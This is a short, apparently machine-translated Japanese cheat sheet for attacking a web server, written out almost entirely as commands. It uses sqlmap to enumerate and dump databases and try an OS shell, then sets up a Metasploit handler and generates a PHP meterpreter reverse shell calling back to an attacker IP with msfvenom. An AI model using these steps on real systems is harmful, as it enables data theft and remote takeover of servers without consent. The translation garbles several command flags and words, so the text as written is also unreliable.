1.のhttp:// IP:ポートを見つけるために、ページを開くための情報
2.ウェブ脆弱性スキャナOWASP-ザップ
3.使用して、SQLインジェクションの脆弱性を使用しSQLMAP
SQLMAP -u URL -dbsは、データベース名を表示します
SQLMAP -u URL -D「データベース名」-tablesは、データベーステーブル内の対応するデータを表示します
SQLMAP -u URL -D「データベース名」-T「テーブル」-columnsは、対応するフィールドを表示します
SQLMAP -u URL -D「データベース名」-T「テーブル名」-C「列名」の値に対応するビューの-dumpフィールド
またSQLMAP -u URL -OSシェルダイレクトアクセスシェルを試すことができます
4. ifconfigコマンド
netstatの-pantuは、ローカルポートのケースを見ます
5.リスナー攻撃機を起動します
>使用MSFは/マルチ/ハンドラを利用します
設定されたペイロードのLinux / x86の/ meterpreter / reverse_tcp
lhost攻撃機のIPアドレスを設定します
4444 lportは設定
ラン
6.リバウンドシェルを生成します
msfvenom -p PHP / meterpreter / reverse_tcp lhost =攻撃IP lportは= 4444 -f生> /root/Desktop/shell.php